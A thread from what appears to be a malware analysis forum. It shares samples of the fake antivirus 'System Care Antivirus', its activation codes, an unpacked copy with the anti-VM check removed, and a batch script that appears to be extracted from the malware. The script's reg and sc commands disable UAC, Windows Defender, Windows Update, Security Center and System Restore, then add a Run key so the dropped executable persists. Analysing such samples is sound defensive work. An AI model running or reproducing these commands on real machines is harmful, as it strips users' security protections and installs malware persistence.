System Care Antivirus - 3 samples
Attachments
pass: infected
(1.15 MiB) Downloaded 113 times
(1.15 MiB) Downloaded 113 times
A forum for reverse engineering, OS internals and malware analysis
Win32:Virut wrote:8 samplesActivation Code: ?O?Z?L?W?I?T?F?Q?C?N?Y?K?V?H?S?E
Antivirus System
Xylitol wrote:http://www.bleepingcomputer.com/virus-r ... -antivirusactivation codes:
Due to a request here is the unpacked and with anti-vm fixed.
https://www.virustotal.com/en/file/daf1 ... 374930794/
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v AA2014 /t REG_SZ /d C:\ProgramData\3X9DV7p6\3X9DV7p6.exe